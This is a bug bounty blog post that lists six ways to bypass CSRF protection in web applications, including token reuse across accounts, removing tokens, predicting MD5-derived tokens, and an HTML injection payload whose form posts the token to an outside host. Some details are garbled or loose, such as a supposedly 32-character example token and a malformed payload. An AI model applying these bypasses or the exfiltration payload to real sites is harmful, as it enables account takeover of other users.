- Using a CSRF token across accounts
The simplest and deadliest CSRF bypass is when an application does not validate if the CSRF token is tied to a specific account or not and only validates the algorithm. To validate this
Login to an application from Account A
Go to its password change page
Capture the CSRF token using burp proxy
Logout and Login using Account B
Go to password change page and intercept that request
Replace the CSRF token
2. Replacing value of the same length
Another technique is that you find the length of that token, for instance, it is an alphanumeric token of 32 characters under the variable authenticity_token you replace the same variable some other 32 character value
For instance the token is ud019eh10923213213123, you replace it with a token of the same value.
3. Removing the CSRF token from requests entirely
This technique normally works on account deleting functions where the token is not verified at all giving the attacker an edge to delete the account of any user via CSRF. But i have found out that it may work on other functionalities as well. It is simple, you intercept the request with burpsuite and remove the token from the entirely, 40% of the applications i have tested were found vulnerable to this technique
4. Decoding CSRF tokens
Another method to bypass CSRF is to identify the algorithm of the CSRF token. In my experience, CSRF tokens are either MD5 or Base64 encoded values. You can decode that value and encode the next one in that algorithm and use that token. For instance “a0a080f42e6f13b3a2df133f073095dd” is MD5(122). You can similarly encrypt the next value MD5(123) to for CSRF token bypass.
5. Extracting token via HTML injection
This technique utilizes HTML injection vulnerability using which an attacker can plant a logger to extract the CSRF token from that web page and use that token. An attacker can plant a link such as
<form action=”http://shahmeeramir.com/acquire_token.php”></textarea>
6. Using only the static parts of the token
It is often observed that the CSRF token is composed of two parts. A static part and a dynamic part. Consider two CSRF tokens shahmeer742498h989889 and shahmeer7424ashda099s. Mostly if you use the static part of the token as shahmeer7424 you are able to use that token
There are many other ways to bypass CSRF protection, but i have mostly encountered these in my bug hunting career. If you know any others, please mention in the comments below, also let me know what would you like me to blog about more
